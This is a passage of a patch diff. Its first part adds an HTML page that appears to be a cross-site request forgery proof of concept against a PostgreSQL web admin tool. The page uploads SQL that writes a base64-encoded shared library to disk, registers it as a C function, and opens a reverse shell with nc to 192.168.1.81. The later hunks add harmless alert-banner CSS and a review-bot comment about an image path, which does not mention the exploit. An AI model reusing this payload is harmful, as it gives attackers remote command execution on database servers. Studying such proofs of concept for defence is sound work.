AAAAAAYDiAAAAAAABgOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADLAAAABgAAAAMAAAAAAAAAIA4g AAAAAAAgDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAAOAPIAAAAAAA4A8 
AAAAAAAAgAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANQAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAIA AAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADdAAAAAQAAAAMAAAAAAAAAIBAgAAAAAAAgEAAAAAAAAAgAAAAAAAAAA AAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA4wAAAAgAAAADAAAAAAAAACgQIAAAAAAAKBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA AQAAAAAAAAAAAAAAAAAAAOgAAAABAAAAMAAAAAAAAAAAAAAAAAAAACgQAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA AAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAABQEAAAAAAAAFgFAAAAAAAAGgAAACwAAAAIAAAAAAAAABgAAAAAAA AACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAqBUAAAAAAADUAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADA AAAAAAAAAAAAAAAAAAAAAAAAHwXAAAAAAAA8QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
+ "SELECT lo_export(43213, \'/tmp/pg_exec.so\');\r\n" +
+ "CREATE FUNCTION sys(cstring) RETURNS int AS \'/tmp/pg_exec.so\', \'pg_exec\' LANGUAGE \'c\' STRICT;\r\n" +
+ "SELECT sys(\'mknod /tmp/backpipe p\');\r\n" +
+ "SELECT sys(\'/bin/sh 0\x3c/tmp/backpipe | nc 192.168.1.81 80 1\x3e/tmp/backpipe\');\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
+ "\r\n" +
+ "2097152\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
+ "Content-Type: application/octet-stream\r\n" +
+ "\r\n" +
+ "\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
+ "\r\n" +
+ "Execute\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
+ "\r\n" +
+ "localhost:5432:allow\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
+ "\r\n" +
+ "postgres\r\n" +
+ "-----------------------------297112967428312--\r\n";
+ var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++)
+ aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody]));
+ }
+</script>
+<form action="#">
+ <input type="button" value="Submit request" onclick="submitRequest();" />
+</form>
+</body>
+</html>
Index: themes/global.css
===================================================================
--- themes/global.css.orig
+++ themes/global.css
@@ -72,6 +72,26 @@ body.browser {
}
.ac_values {width:100%}
+/** alert banner **/
+.alert-banner {
+ background-color: #FEEFB3;
+ border: 1px dotted #9F6000;
+ color: #9F6000;
+ padding: 4px;
+ margin: 4px 0;
+}
+.alert-banner p {
+ margin: 0;
+ padding: 0;
+}
+.alert-banner p:before {
+ content: url(../../images/themes/default/ObjectNotFound.png);
+ vertical-align: -20%;
+}
+.alert-banner p a {
+ color: #9F6000;
+}
+
/** bottom link back to top **/
.bottom_link {
position: fixed;
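Review bot: The `content: url(../../images/themes/default/ObjectNotFound.png)` path in the `.alert-banner p:before` rule resolves relative to the stylesheet; if themes/global.css is served from the themes/ directory, `../../` climbs above the application root and the icon will 404, whereas themes/gotar/global.css is one level deeper. Please check how the existing theme stylesheets reference images and use the same relative depth, or point the rule at an image next to the stylesheet. A one-line comment such as `/* path is relative to this stylesheet's directory */` would help the next theme author.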
Index: themes/gotar/global.css
===================================================================
--- themes/gotar/global.css.orig
+++ themes/gotar/global.css
@@ -136,6 +136,7 @@ td.opbutton1 a, td.opbutton2 a {
padding-left:6px;
padding-right:6px;
}
+.alert-banner { margin-top: 0 }
.topbar { border: 0 }
.topbar, .topbar *, .trail, .tab, .crumb {
border: 0;